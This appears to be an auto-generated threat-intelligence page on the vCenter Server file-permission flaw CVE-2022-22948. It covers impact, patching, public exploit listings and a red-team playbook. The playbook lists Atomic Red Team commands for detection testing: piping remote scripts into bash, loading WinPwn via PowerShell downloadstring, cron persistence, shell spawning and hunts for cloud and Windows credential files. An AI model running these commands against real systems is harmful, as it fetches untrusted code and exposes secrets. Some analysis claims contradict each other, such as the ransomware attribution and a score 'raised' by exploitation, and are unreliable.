CVE-2022-22948
Overview
This vulnerability is an information disclosure flaw caused by improper file permission settings within VMware vCenter Server and VMware Cloud Foundation components. The root cause lies in the misconfiguration of access controls on sensitive files, allowing users with limited privileges to access data they should not have permission to view. The issue specifically affects file system permissions in the vCenter Server environment, enabling unauthorized read access to protected information.
Vulnerability Description
The vCenter Server contains an information disclosure vulnerability due to improper permission of files. A malicious actor with non-administrative access to the vCenter Server may exploit this issue to gain access to sensitive information.
Impact
An attacker with a low-privileged account on the vCenter Server can access sensitive information such as configuration details or credentials stored in improperly protected files. This unauthorized access can facilitate further attacks, including lateral movement within the infrastructure or escalation of privileges by leveraging disclosed secrets. The vulnerability requires only limited authentication and no user interaction beyond initial access, potentially leading to significant data breaches and compromise of the virtualized environment's security posture.
Solution
VMware has addressed this issue in advisory VMSA-2022-0009, which provides patches for vCenter Server 6.5 and VMware Cloud Foundation. Administrators should apply the updates as specified in the advisory available at https://www.vmware.com/security/advisories/VMSA-2022-0009.html. No alternative workarounds are provided; timely patching is recommended to remediate the improper file permission settings.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
UNC3886
|
MEDIUM | — | correlation_mitre |
Full Analysis
The vulnerability in vCenter Server arises from improper permissions assigned to files, leading to potential information disclosure. This flaw allows a malicious actor with non-administrative access to exploit the system and gain unauthorized access to sensitive data. The underlying issue stems from a misconfiguration in the access control mechanisms that govern file permissions, which should ideally restrict access to sensitive information based on user roles. The failure to enforce these restrictions adequately opens the door for exploitation, where an attacker could leverage their existing access to read files that should remain confidential.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be exploited. An attacker with basic access rights could employ various techniques to navigate the file system and identify sensitive files. For example, they might use directory traversal or other reconnaissance methods to locate files that contain sensitive configuration data, user credentials, or other critical information. Once identified, the attacker can read this data, potentially leading to further exploitation of the environment, such as lateral movement within the network or privilege escalation. The simplicity of the attack, combined with the potential for significant information leakage, makes this vulnerability particularly dangerous.
The real-world impact of this vulnerability can be severe, especially for organizations that rely heavily on vCenter Server for managing their virtualized environments. The exposure of sensitive information can lead to data breaches, regulatory fines, and loss of customer trust. For instance, if an attacker gains access to user credentials or configuration files, they could compromise the integrity of the entire virtual infrastructure, leading to service disruptions or unauthorized access to critical systems. The business risk extends beyond immediate financial implications; it can also affect an organization’s reputation and operational continuity, making it imperative for organizations to address this vulnerability promptly.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and audits of file permissions should be conducted to ensure that only authorized users have access to sensitive files. Additionally, employing intrusion detection systems can help identify unusual access patterns that may indicate an attempted exploitation of this vulnerability. Organizations should also consider applying the latest patches and updates provided by VMware, as these often contain fixes for known vulnerabilities. Furthermore, educating staff about the importance of access controls and the potential risks associated with misconfigured permissions can enhance overall security posture.
In conclusion, the information disclosure vulnerability in vCenter Server presents a significant risk to organizations that utilize this platform for their virtual infrastructure management. The ease of exploitation, combined with the potential for severe consequences, underscores the need for proactive security measures. By implementing robust detection and mitigation strategies, organizations can safeguard their sensitive information and minimize the risk of unauthorized access. Addressing this vulnerability is not just a technical necessity; it is a critical component of maintaining trust and integrity in an increasingly complex digital landscape.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2022-22948, coinciding with the emergence of new public proof-of-concept exploits and a Metasploit module that significantly lowers the technical barrier for attackers. This development has elevated the vulnerability’s CVSS score to 6.5 and prompted its inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its growing operational relevance. Our telemetry indicates a sharp increase in exploitation attempts, with the vulnerability now linked to the UNC3886 ransomware group, highlighting a shift toward more aggressive threat actor engagement. Although the EPSS score shows a slight decline recently, its current level remains elevated, reflecting sustained exploitation potential. This evolution materially increases the risk posture for organizations running VMware vCenter Server, as the availability of automated tools and public exploits facilitates broader and more frequent attacks. Defenders should recognize that the vulnerability has transitioned from a theoretical concern to an actively exploited vector leveraged by sophisticated adversaries, thereby raising the urgency for detection and response capabilities.
Update 2 — July 09, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2022-22948, with telemetry indicating a doubling in detection frequency over recent monitoring periods. This surge underscores increased adversary interest and potentially broader scanning or exploitation attempts against VMware vCenter Server environments. Although the EPSS score remains stable and below critical thresholds, the sharp rise in observed activity signals a shift from sporadic probing to more persistent targeting. The presence of publicly available proof-of-concept exploits and Metasploit modules further lowers the barrier for exploitation, increasing the likelihood of successful information disclosure incidents. While ransomware groups have not been definitively linked to this vulnerability’s exploitation, the association with UNC3886 suggests potential for future integration into more complex attack chains. Collectively, these developments elevate the threat level from moderate concern to a more urgent operational risk, emphasizing the need for heightened vigilance in detection and response efforts within affected environments.
Affected Products (63)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
VMware vCenter Secrets Dump
post/linux/gather/vcenter_secrets_dump
|
- | Unknown | linux, unix | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PenteraIO/CVE-2022-22948
Scanner for CVE-2022-22948 an Information Disclosure in VMWare vCenter
|
PenteraIO | 11 | 6 | 2021-10-17 | View |
|
PoC
|
- | 0 | 0 | - | View |
Ransomware Groups 1
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-22948 |
| vmware.com |
GitHub CVE
x_refsource_MISC
|
https://www.vmware.com/security/advisories/VMSA-2022-0009.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-22948 |